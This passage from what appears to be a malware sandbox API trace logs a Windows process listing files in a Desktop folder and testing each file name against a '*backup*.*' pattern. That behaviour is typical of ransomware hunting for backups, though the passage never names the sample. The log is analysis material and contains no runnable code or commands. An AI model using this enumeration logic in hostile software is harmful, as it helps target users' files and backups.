lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*" [0110.892] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.892] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.892] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\." [0110.892] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.892] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\.") returned="\\KTOu\\_5VgSE0-6jvrM\\." [0110.892] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.892] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.892] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.892] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.." [0110.892] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.892] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\..") returned="\\KTOu\\_5VgSE0-6jvrM\\.." [0110.892] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.892] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.892] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.892] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.892] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.893] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.893] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.893] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.893] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4c) returned 0x38eaa50 [0110.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x38eaa50, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf20 [0110.893] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaa50 | out: hHeap=0x29a0000) returned 1 [0110.893] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970da0 [0110.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970da0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.893] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.893] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*backup*.*") returned 0 [0110.893] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.893] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf20 | out: hHeap=0x29a0000) returned 1 [0110.893] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.893] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.893] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.893] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.893] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.893] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.893] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.893] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x49) returned 0x38eadc0 [0110.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x38eadc0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.894] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf20 [0110.894] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eadc0 | out: hHeap=0x29a0000) returned 1 [0110.894] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.894] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f20 [0110.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970f20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.894] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.894] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0110.894] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*backup*.*") returned 0 [0110.894] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.894] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf20 | out: hHeap=0x29a0000) returned 1 [0110.894] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.894] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.894] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.894] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.896] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.896] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.896] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.896] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.896] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x42) returned 0x39700d0 [0110.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.896] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eac08 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ba0 [0110.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970ba0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.897] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*backup*.*") returned 0 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eac08 | out: hHeap=0x29a0000) returned 1 [0110.897] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.897] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.897] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.897] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.897] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.897] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.897] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2ae0 [0110.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a2ae0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970da0 [0110.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=11, lpWideCharStr=0x3970da0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.897] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.897] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.898] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*backup*.*") returned 0 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.898] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.898] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.898] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.898] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea4d8 [0110.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x38ea4d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpUsedDefaultChar=0x0) returned 50 [0110.898] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea4d8 | out: hHeap=0x29a0000) returned 1 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.898] RtlAllocateHeap 